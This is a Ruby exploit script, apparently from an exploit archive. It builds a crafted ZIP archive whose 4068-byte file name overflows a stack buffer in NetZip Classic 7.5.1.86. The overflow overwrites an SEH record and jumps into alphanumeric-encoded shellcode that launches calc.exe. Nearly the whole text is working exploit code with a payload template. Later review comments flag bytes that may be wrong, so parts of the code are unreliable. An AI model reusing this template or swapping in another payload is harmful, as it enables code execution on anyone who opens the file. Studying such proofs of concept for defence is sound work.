
NetZip Classic Buffer Overflow

Posted on 01 February 2011

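#
# [+] Exploit Title: Exploit Buffer Overflow NetZip Classic (SEH)
# [+] Date: 0130\2011
# [+] Author: C4SS!0 G0M3S
# [+] Software Link: http://proforma.real.com/real/nzclassic/nzclassic.html
# [+] Version: 7.5.1.86
# [+] Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
# [+] CVE: N/A
#
# The structure of the zip file has been copied from the Corelan Team exploit.
# Thanks for all the tutorials, Corelan Team.
#
# Created by C4SS!0 G0M3S
# WWW.INVASAO.COM.BR
# Louredo_@hotmail.com
#
# Proof of concept.  Writes a .zip archive holding one stored, empty entry
# whose file name is 4068 bytes long.  Opening that archive in NetZip
# Classic 7.5.1.86 overflows a stack buffer and overwrites an SEH record;
# the overwritten handler address and the bytes that follow it lead into an
# alphanumeric-encoded payload that runs calc.exe.  Only open the generated
# file inside an isolated test VM.
#
# NOTE(review): the published listing had lost the backslash of every
# "\x.." escape (e.g. "x50x4B" where "\x50\x4B" was meant), so the headers
# were ASCII text rather than ZIP signatures; the escapes are restored here.
# NOTE(review): the SEH return address is hard-coded for the build/locale
# listed above and the listing does not name the module it comes from;
# re-find it in a debugger before relying on this script elsewhere.

# Clear the console and print the banner.  "cls"/"color" are Windows
# console commands; on other platforms they simply fail and are ignored.
def usage()
  system("cls")
  system("color 4f")
  str = "\n" +
        "[+]Exploit Buffer Overflow NetZip Classic 7.5.1.86\n" +
        "[+]Author C4SS!0 G0M3S\n" +
        "[+]E-mail Louredo_@hotmail.com\n"
  print str
end

# Exactly one argument: the output file name.  Exit non-zero on misuse so
# callers (and shells) can tell nothing was written.
if ARGV.length != 1
  usage()
  print "\n[-]Usage: " + $0 + " <File Name>\n"
  print "[-]Example: " + $0 + " Exploit.zip\n"
  exit 1
end

usage()
filename = ARGV[0]

# --- ZIP scaffolding (layout taken from the Corelan exploit) ---------------
# Local file header (30 bytes): "PK\x03\x04", version 0x14, flags 0,
# method 0 (stored), mod time/date, then zeroed CRC/sizes, and \xe4\x0f
# (= 0x0fe4 = 4068) intended as the file-name length.
# NOTE(review): by my count only 25 bytes precede \xe4\x0f here, whereas the
# central-directory entry below puts its length field at the correct offset
# (28); the local header therefore looks one byte short.  It is kept as
# published because the archive is what was tested — verify against the ZIP
# layout before reusing this template.
head1 = "\x50\x4B\x03\x04\x14\x00\x00" +
        "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" +
        "\x00\x00\x00\x00\x00\x00\x00\x00" +
        "\xe4\x0f" +
        "\x00\x00\x00"

# Central directory entry (46 bytes): "PK\x01\x02", version made/needed
# 0x14, flags 0, method 0, mod time/date, zeroed CRC/sizes, name length
# 0x0fe4 (= 4068), no extra/comment, internal attr 1, external attr 0x24,
# local header offset 0.
head2 = "\x50\x4B\x01\x02\x14\x00\x14" +
        "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" +
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
        "\xe4\x0f" +
        "\x00\x00\x00\x00\x00\x00\x01\x00" +
        "\x24\x00\x00\x00\x00\x00\x00\x00"

# End of central directory (22 bytes): one entry, central directory size
# 0x1012 (= 46 + 4068) at offset 0x1002 (= 30 + 4068), no comment.
end1 = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00" +
       "\x12\x10\x00\x00" +
       "\x02\x10\x00\x00" +
       "\x00\x00"

# --- Overflow layout -------------------------------------------------------
# 235 bytes of filler put the next 8 bytes on top of the SEH record.
buffer = "\x41" * 235

# next-SEH pointer, executed as code rather than used as a short jump:
# 0x59 POP ECX, 0x40 INC EAX (x3).
nseh = "\x59\x40\x40\x40"

# Overwritten handler address (see the NOTE at the top); 'V' = 32-bit LE.
seh = [0x10057A41].pack('V')

# Small stub between the SEH record and the encoded shellcode.  Byte values
# per the original comments: 0x41 INC ECX (five of them, although the
# original comment said four), 0x61 POPAD (six), 04 10 ADD AL,0x10.
# NOTE(review): the listing gives "\x98\xd1" for the instruction labelled
# CALL EAX, which is normally encoded FF D0; the bytes are kept exactly as
# published — confirm in a debugger what actually executes here.
egg = "\x41" * 5           # INC ECX x5
egg += "\x61" * 6          # POPAD x6
egg += "\x04\x10"          # ADD AL,0x10
egg += "\x98\xd1"          # labelled CALL EAX in the original (see NOTE)
egg += "\x41" * 5          # padding up to the shellcode

puts "\n[*]Identifying the Shellcode length\n"
sleep(1)

# Alphanumeric-encoded WinExec("calc",0) shellcode; register EAX is used as
# the base address for the decoder (per the original comments).
shellcode = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYKIPVQXIOO3L5FBPXLN9D" +
            "46DJTNQ5N0XVQD84XK3M8KL33RXE8L4MUP02XOLSUO92XOFVCKEL3X4NNSM5RNJGJP2ELOOSRJM5M64X" +
            "USVQ9WQKWLVSPJUT1XJDFWEZUB4O7SLKKUKUURKZP179M1XKMWRP8EKI2M8YSZW7KCJ8OPL0O7SHSPSY" +
            "41GL7XXWKLCLNK35O0WQCSTPQY1VSXML5O6L5IQCNMHJUNJL1UUOX7VMIWMWK9PXYKN0QE1OFTNVOMUT" +
            "YK7OGT8FOPYLP3K8W5UCOM83KYZA"

puts "\n[*]The Shellcode length is: #{shellcode.length}\n"
sleep(1)

# Pad the file name to 4064 bytes before the ".txt" suffix (4068 total),
# which is the length the ZIP headers above advertise.  Guard the
# subtraction so a longer payload gives a clear error instead of Ruby's
# "negative argument" from String#*.
used = (buffer + nseh + seh + egg + shellcode).length
if used > 4064
  puts "\n[-]Payload is #{used} bytes; it must not exceed 4064\n"
  exit 1
end
junk = "\x41" * (4064 - used)

payload = buffer + nseh + seh + egg + shellcode + junk
payload += ".txt"

# The same over-long name appears in both the local header and the central
# directory entry, as the EOCD sizes/offsets above assume.
exploit_zip = head1 + payload + head2 + payload + end1

puts "\n[*]Creating the file #{filename}\n"
sleep(1)

# Write in binary mode with File#write: text mode on Windows would translate
# 0x0a bytes, and File#puts appends a newline to the archive.  The block
# form closes the handle even if the write raises.
begin
  File.open(filename, "wb") { |f| f.write(exploit_zip) }
  puts "\n[*]The file #{filename} was created successfully\n"
  sleep(1)
rescue SystemCallError, IOError => e
  puts "\n[*]Error when creating the file #{filename}: #{e.message}\n"
  exit 1
end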

 
